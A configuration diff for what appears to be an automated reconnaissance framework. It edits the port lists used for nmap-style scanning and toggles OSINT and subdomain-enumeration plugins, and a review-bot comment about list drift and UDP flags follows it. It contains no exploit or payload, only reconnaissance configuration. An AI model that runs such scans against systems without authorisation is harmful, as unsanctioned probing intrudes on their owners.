-DEFAULT_TCP_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-981
5,9855,9875,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535" -DEFAULT_UDP_PORTS="53,67,68,69,88,123,161,162,137,138,139,389,520,2049" -FULL_PORTSCAN_PORTS="1-65535" +QUICK_PORTS="21,22,23,25,53,80,110,137,138,139,161,162,443,445,512,513,514,1099,1433,3306,4444,5555,5432,5555,5900,5901,6093,6095,6667,7001,8080,8888,8000,10000,49180" +DEFAULT_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,67,68,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2780,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6093,6095,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,
6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8009,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8983,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9876,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,49180,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535,U:53,U:67,U:68,U:69,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:500,U:520,U:2049" 
+DEFAULT_TCP_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,67,68,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2780,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6093,6095,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8009,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8983,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9876,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,330
00,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,49180,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535" +DEFAULT_UDP_PORTS="53,67,68,69,88,123,161,162,137,138,139,389,500,520,2049" +FULL_PORTSCAN_PORTS="T:1-65535,U:53,U:67,U:68,U:69,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:500,U:520,U:2049" THREADS="30" @@ -106,6 +116,7 @@ GOOHAK="1" INURLBR="1" THEHARVESTER="1" METAGOOFIL="1" +HUNTERIO="0" # ACTIVE WEB PLUGINS BURP_SCAN="1" @@ -149,6 +160,6 @@ DNSCAN="1" CRTSH="1" SUBOVER="1" PROJECT_SONAR="1" -CENSYS_SUBDOMAINS="1" +CENSYS_SUBDOMAINS="0" SUBNET_RETRIEVAL="1" SUBJACK="1" \ No newline at end of file
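Review bot: The `U:` list embedded in the new `DEFAULT_PORTS` already disagrees with `DEFAULT_UDP_PORTS` (the latter has 123, the former does not), and `DEFAULT_TCP_PORTS` is now a near-verbatim copy of `DEFAULT_PORTS` minus the UDP entries, so three hand-maintained lists will keep drifting. Derive the combined list instead: `DEFAULT_PORTS="$DEFAULT_TCP_PORTS,$(printf '%s' "$DEFAULT_UDP_PORTS" | sed 's/^/U:/;s/,/,U:/g')"` (placed after the two component lists). The new `FULL_PORTSCAN_PORTS="T:1-65535,U:..."` and the `U:` entries only take effect if the nmap invocation that consumes these variables passes `-sU` — I believe nmap otherwise drops the UDP spec with a warning, so please check the call site, which is not in this diff. `QUICK_PORTS` still lists 5555 twice; nmap tolerates it but emits a duplicate-port warning on every quick scan.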